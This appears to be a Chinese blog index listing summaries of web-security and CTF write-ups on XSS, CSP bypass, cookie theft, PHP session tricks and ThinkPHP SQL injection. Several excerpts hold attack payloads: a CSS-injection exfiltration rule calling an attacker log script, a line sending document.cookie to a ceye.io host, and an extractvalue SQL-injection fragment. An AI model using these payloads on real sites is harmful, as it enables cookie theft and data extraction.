Afant1

摘要： payload: input[value^='a'] { background-image: url(http://localhost/css-improved/attacker/log.php/a); }input[value^='ab'] { background-image: url(http 阅读全文

摘要： 同域下，即使设置了cookie的路径还是能将不同路径cookie读出来。 1.在/ctf/day3/ 目录设置一个cookie 2.其他目录下是不能访问这个cookie的 3.通过iframe可以实现跨目录读取cookie 总结：通过设置path不能防止cookie被盗取。 阅读全文

摘要： iframe的子操作父窗口，父操作子窗口： test.php: a.html 子操作父窗口： 父操作子： 以上是在同域下操作的，可对不同页面读写操作， 如果将iframe的srcs修改为<iframe src="http://www.123.com/csp/a.html" id="iframe">< 阅读全文

摘要： iframe.php代码如下： allow-popups开启时，window.open就可以打开新的窗口。 看csp规则，默认是在当前域内，如果这是一个ctf题的话，就很简单了，window.location.href='http://aa.xxxx.ceye.io?'+document.cooki 阅读全文

摘要： 1、self-xss+302跳转构造csrf的利用: 1、login.php 存在跳转2、http://54.223.108.205:23333/login.php?redirecturl=//vps/c.html 通过302跳转构造csrf提交到reportbug页面让管理员提交一篇有xss的文章 阅读全文

摘要： 页面目录如下： register.php注册页面。 user.php可发送消息给其他用户。 profile.php可配置参数添加用户头像（加载eval js文件）。 static存在redirect.php重定向页面。 看下csp规则： 1、script没有开启unsafe-inline，也就是说不 阅读全文

摘要： 1、php 键名 ＋ 竖线 ＋ 经过 serialize() 函数反序列处理的值2、php_binary 键名的长度对应的 ASCII 字符 ＋ 键名 ＋ 经过 serialize() 函数反序列处理的值3、php_serialize (php>=5.5.4) 经过 serialize() 函数反序 阅读全文

摘要： exp.php的内容，存在文件包含 查看phpinfo信息 当cleanup是off的情况下，构造如下数据包上传文件。 当 session.upload_progress.enabled INI 选项开启时，一个上传在处理中，同时POST一个与INI中设置的session.upload_progre 阅读全文

摘要： 1、load方法 使用load()方法通过Ajax请求加载服务器中的数据，并把返回的数据放置到指定的元素中，它的调用格式为： $(selector).load(URL,data,callback); 参数url为加载服务器地址，可选项data参数为请求时发送的数据，callback参数为数据请求成功 阅读全文

摘要： 1.where后直接直接拼接会产生注入 $data = M('user')->where("id=".I('id'))->select(); 2.table ?biao=thinkphp_user where 1=1 and 1=(extractvalue(1, concat(0x7e, (sele 阅读全文